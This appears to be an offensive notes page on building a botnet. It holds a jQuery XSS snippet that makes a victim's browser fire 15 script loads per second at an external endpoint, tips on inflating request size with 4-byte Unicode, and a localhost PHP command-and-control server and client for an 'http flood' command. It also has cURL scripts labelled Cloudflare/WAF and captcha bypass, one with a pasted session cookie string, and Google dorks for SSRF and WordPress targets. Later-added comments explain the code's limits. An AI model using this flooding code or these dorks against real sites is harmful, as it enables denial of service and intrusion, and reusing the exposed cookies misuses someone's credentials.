Botnet

jQuery browser zombie 7 layer(XSS)

 

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
    <script>
        // Once per second, fire 15 jQuery $.getScript() calls at one fixed endpoint.
        // Note that $.getScript() is not a plain GET: it evaluates whatever
        // JavaScript the endpoint returns, so a page carrying this snippet is
        // executing code chosen by whoever controls that URL — the "zombie" page
        // is itself the first thing compromised.
        // For monitoring: 15 identical cross-origin script loads per second from
        // a single page is an easy pattern to spot in browser devtools, proxy
        // logs and CDN access logs.
        setInterval(function() {
            // 15 async requests per second (1000 milliseconds)
            // $(document).ready() inside the timer adds nothing: once the page has
            // loaded, jQuery runs the handler effectively immediately on every tick.
            $(document).ready(function(){
                //5
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                //10
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                //15
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
                $.getScript("https://eoywflzujjp8ktn.m.pipedream.net");
            });
        }, 1000);
    </script>

- Turns the client browser into a botnet node sending 15 HTTP GET requests per second; this can also be combined with a URL carrying a huge HTTP request header, e.g. a GET parameter in the URL made of the 🔟 (4-byte) character, to inflate the request size

 

Huge byte Unicode(STRESS)

 

- 🔟(4 byte)

GET method (maximum is 2000 character)

- 🔟 x 1000(4000 byte or 4 kb)

- 🔟 x 2000(8000 byte or 8 kb)

POST method (must display your input if not its useless)

- 🔟 x 10.000(40.000 byte or 40 kb)

- 🔟 x 100.000(400.000 byte or 400 kb)

- 🔟 x 1.000.000(4.000.000 byte or 4.000 kb or 4 MB)


PHP Botnet 7 layer C&C

 

- server.php
<?php
// Minimal TCP "command" server: accepts connections on a loopback port for
// roughly 60 seconds, prints whatever clients send, then pushes one plaintext
// command word to every stored client and exits.

ini_set('error_reporting', E_ALL ^ E_NOTICE);
ini_set('display_errors', 1);

// Set time limit to indefinite execution
set_time_limit(0);

// Set the ip and port we will listen on
// 127.0.0.1: only processes on this same host can reach the listener.
$address = '127.0.0.1';
$port = 6901;

ob_implicit_flush();

// Create a TCP Stream socket
$sock = socket_create(AF_INET, SOCK_STREAM, 0);

// Bind the socket to an address/port
socket_bind($sock, $address, $port) or die('Could not bind to address');

// Start listening for connections
socket_listen($sock);

// Non-blocking listener: socket_accept() below returns at once when nothing is pending
socket_set_nonblock($sock);

// Clients
// Every accepted connection is appended here and never removed, so a client
// that has since disconnected still receives a socket_write() attempt at the end.
$clients = [];

// Loop-iteration counter; with the sleep(1) at the bottom of the loop each
// iteration is approximately one second.
$time = 0;

//command 1.http(HTTP flood)
// The only command this server ever sends. It goes over the wire as the bare
// word, with no authentication, framing or encryption (plain TCP, no TLS).
$command = "http";

while(true){
    // Accept new connections
    if ($newsock = socket_accept($sock)) {
        if (is_resource($newsock)) {
            // Non-blocking for the new connection
            socket_set_nonblock($newsock);
            // Do something on the server side
            echo "New client connected\n";
            // Append the new connection to the clients array
            $clients[] = $newsock;
            echo $newsock."\n__________________________________________________________________\n";
            print_r($clients);
            echo "\n__________________________________________________________________\n";
        }
    }

        // Polling for new messages
    if (count($clients)) {
        foreach ($clients AS $k => $v) {
            // Check for new messages
            // Reads up to 1024 bytes; whatever a client sends is echoed verbatim to
            // the operator's terminal with no parsing or validation.
            if ($char = socket_read($v, 1024)) {
               echo "$k:$char\n";
            }
        }
    }

    // After about 1 minute: broadcast $command to every stored client, then leave the loop
    if($time == 60){
        echo "\n__________________________________________________________________\n";
        echo "Socket closed, total client connected :".count($clients);
        foreach ($clients as $key => $value) {
            socket_write($value, $command, strlen($command));
        }
        break;
    }
    sleep(1);
    $time+=1;
}

// Close the master sockets
// Only the listening socket is closed explicitly; the per-client sockets are
// left to process exit.
socket_close($sock);
?>


- client.php

<?php  
// Minimal TCP client for the server above: sends one greeting, reads one
// plaintext command word back, and either loops forever or exits.
$host    = "127.0.0.1";
$port    = 6901;
$message = "Hello Server";
echo "Message To server :".$message."\n";
// create socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create socket\n");
// connect to server
$result = socket_connect($socket, $host, $port) or die("Could not connect to server\n");  
// send string to server
socket_write($socket, $message, strlen($message)) or die("Could not send data to server\n");
// get server response
// Blocking read of up to 1024 bytes; whatever arrives is treated as the command
// with no check on who sent it.
$result = socket_read ($socket, 1024) or die("Could not read server response\n");
echo "Command from server:".$result."\n";
// Loose (==) comparison of the raw bytes read against the command word.
if($result == "http"){
    // No traffic is generated in this branch: it only prints a label once per
    // second, forever, and never closes the socket.
    while(true){
        echo "HTTP flood";
        sleep(1);
    }
}else{
    // "gagal" is Indonesian for "failed".
    echo"gagal";
    socket_close($socket);
}
?>


Bypass 301,302,Cloudflare and WAF

<?php  
// Fetch one URL with cURL, following redirects, and dump the transfer info
// together with the raw response headers, body and any Set-Cookie values.
// Nothing here circumvents anything: the client simply follows 301/302
// redirects as a browser would, and a WAF or bot-management challenge page is
// received as ordinary content and ends up in $body_content.
$url = 'google.com';
$cookiesIn = '';
$options = array(
            CURLOPT_RETURNTRANSFER => true,     // return web page
            CURLOPT_HEADER         => true,     //return headers in addition to content
            CURLOPT_FOLLOWLOCATION => true,     // follow redirects
            CURLOPT_ENCODING       => "",       // handle all encodings
            CURLOPT_AUTOREFERER    => true,     // set referer on redirect
            CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
            CURLOPT_TIMEOUT        => 120,      // timeout on response
            CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
            CURLINFO_HEADER_OUT    => true,
            CURLOPT_SSL_VERIFYPEER => true,     // Validate SSL Certificates
            CURLOPT_HTTP_VERSION   => CURL_HTTP_VERSION_1_1,
            CURLOPT_COOKIE         => $cookiesIn
        );

$ch      = curl_init( $url );
curl_setopt_array( $ch, $options );
$rough_content = curl_exec( $ch );
$err     = curl_errno( $ch );
$errmsg  = curl_error( $ch );
$header  = curl_getinfo( $ch );
curl_close( $ch );

// curl_exec() returns false on failure; that case is not checked before the
// substr()/str_replace() below, so a failed transfer still prints a result
// with empty headers/content and only errno/errmsg to tell the difference.
$header_content = substr($rough_content, 0, $header['header_size']);
$body_content = trim(str_replace($header_content, '', $rough_content));
// Collects name=value from every Set-Cookie header in the returned header
// block (with CURLOPT_HEADER and FOLLOWLOCATION, header_size should cover the
// headers of every redirect hop — verify against the libcurl version in use).
$pattern = "#Set-Cookie:\\s+(?<cookie>[^=]+=[^;]+)#m";
preg_match_all($pattern, $header_content, $matches);
$cookiesOut = implode("; ", $matches['cookie']);

$header['errno']   = $err;
$header['errmsg']  = $errmsg;
$header['headers']  = $header_content;
$header['content'] = $body_content;
$header['cookies'] = $cookiesOut;
print_r($header);
?>


Captcha, verify human bypass

<?php  
// Same fetch-and-dump routine as above, but with a browser-like header set
// and a hard-coded Cookie: header copied from one real browser session.
$url = 'https://www.000webhost.com/';
$cookiesIn = '';
$options = array(
            CURLOPT_RETURNTRANSFER => true,     // return web page
            CURLOPT_HEADER         => true,     //return headers in addition to content
            CURLOPT_FOLLOWLOCATION => true,     // follow redirects
            CURLOPT_ENCODING       => "",       // handle all encodings
            CURLOPT_AUTOREFERER    => true,     // set referer on redirect
            CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
            CURLOPT_TIMEOUT        => 120,      // timeout on response
            CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
            CURLINFO_HEADER_OUT    => true,
            CURLOPT_SSL_VERIFYPEER => true,     // Validate SSL Certificates
            CURLOPT_HTTP_VERSION   => CURL_HTTP_VERSION_1_1,
            // $cookiesIn is empty; the cookies actually sent are the ones in the
            // explicit Cookie: header below.
            CURLOPT_COOKIE         => $cookiesIn,
            CURLOPT_HTTPHEADER     => array(
                'Host: www.000webhost.com',
                'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0',
                'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
                'Accept-Language: en-US,en;q=0.5',
                'Accept-Encoding: gzip, deflate, br',
                'Alt-Used: www.000webhost.com',
                'Connection: keep-alive',
                // The line below is a verbatim copy of one browser session's cookies,
                // including a cf_clearance token and a PHPSESSID. These are session
                // credentials pasted into source: nothing is "bypassed" — the request
                // only replays a challenge that was already solved in a browser, and
                // such clearance tokens are time-limited and (per the vendor's docs,
                // verify for the current version) bound to the client that solved it,
                // so the values expire and stop working. Treat pasted cookies like any
                // other secret: they should not be committed, and the session they
                // belong to should be considered exposed.
                'Cookie: cf_clearance=YtsqZDKEGfPKQ8XAvPAWEeSJl9aLyN6voDla5MvXelw-1676895164-0-250; _gcl_au=1.1.301076138.1673967752; _ga_4X6HMPKXDF=GS1.1.1676895166.14.1.1676896117.0.0.0; _ga=GA1.2.2110601089.1673967754; _omappvp=aQxuBVJHk1BfewR3QjHLZ3TnMIlR5eOJwL3jqzBlfgTs9NxDUTGYEFOMQuaeaOG4BbYxJN5hMHkereC8S4r1w0aELDUnxCgi; _vwo_uuid_v2=D4565647E417E7056A67C081977B1B9FC|a6414cb3e089ddda96c8f1ab7eb3d83f; _fbp=fb.1.1673967764940.184116151; _hjSessionUser_1471681=eyJpZCI6IjJhNWJmZWNjLTgyYTItNWYzMS1iOGVmLTk2YWU0ZDBhM2NlMiIsImNyZWF0ZWQiOjE2NzM5Njc3NjQ4NDAsImV4aXN0aW5nIjp0cnVlfQ==; sg_cookies={%225618039%22:{%22vid%22:%229542e2b8-b56e-4ab2-8713-f95b969b0b9c%22%2C%22lw%22:%222-8-13-46%22%2C%22rf%22:%22%22%2C%22pw%22:21%2C%22tc%22:229%2C%22tv%22:7%2C%22fp%22:642974284%2C%22ts%22:6964%2C%22tmp%22:6964%2C%22si%22:%22331939e0-858f-4740-ad72-bafb30a07a07%22}}; cookiebar=hide; PHPSESSID=455e0846e95563915655b288cad0aa7a; _gid=GA1.2.346653806.1676895167; _hjIncludedInSessionSample_1471681=1; _hjSession_1471681=eyJpZCI6IjM5NWQ2YzJiLWUzYzgtNDNlNC1iY2I1LTQ2ZjJhMjZmNmFmMiIsImNyZWF0ZWQiOjE2NzY4OTUxNjcwNTIsImluU2FtcGxlIjp0cnVlfQ==; _hjAbsoluteSessionInProgress=0; discount-popup-with-counter=hide',
                'Upgrade-Insecure-Requests: 1',
                'Sec-Fetch-Dest: document',
                'Sec-Fetch-Mode: navigate',
                'Sec-Fetch-Site: none',
                'Sec-Fetch-User: ?1',
                'Cache-Control: max-age=0',
                'TE: trailers'
            )
        );

$ch      = curl_init( $url );
curl_setopt_array( $ch, $options );
$rough_content = curl_exec( $ch );
$err     = curl_errno( $ch );
$errmsg  = curl_error( $ch );
$header  = curl_getinfo( $ch );
curl_close( $ch );

// curl_exec() returns false on failure; that case is not checked before the
// substr()/str_replace() below, so a failed transfer still prints a result
// with empty headers/content and only errno/errmsg to tell the difference.
$header_content = substr($rough_content, 0, $header['header_size']);
$body_content = trim(str_replace($header_content, '', $rough_content));
// Collects name=value from every Set-Cookie header in the returned header block.
$pattern = "#Set-Cookie:\\s+(?<cookie>[^=]+=[^;]+)#m";
preg_match_all($pattern, $header_content, $matches);
$cookiesOut = implode("; ", $matches['cookie']);

$header['errno']   = $err;
$header['errmsg']  = $errmsg;
$header['headers']  = $header_content;
$header['content'] = $body_content;
$header['cookies'] = $cookiesOut;
print_r($header);
?>


Server side request forgery(SSRF)

- intext:reverse image search


xmlrpc.php

- "index of" inurl:wp-content/"

